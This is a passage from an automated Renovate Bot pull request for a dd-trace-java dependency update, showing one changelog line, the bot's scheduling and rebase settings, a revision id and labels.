- 🐛 Reactor: early propagate span in context when subscribing ([#8166](DataDog/dd-trace-java#8166) - [@amarziali](https://github.com/amarziali))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "after 6pm every weekday,before 2am every weekday" in timezone Australia/Melbourne, Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://github.com/renovatebot/renovate/discussions) if that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Renovate Bot](https://github.com/renovatebot/renovate).

GitOrigin-RevId: ba2355aa4e2e39ab1fee27319cc4176238efd90b
Labels
comp: asm waf Application Security Management (WAF) type: enhancement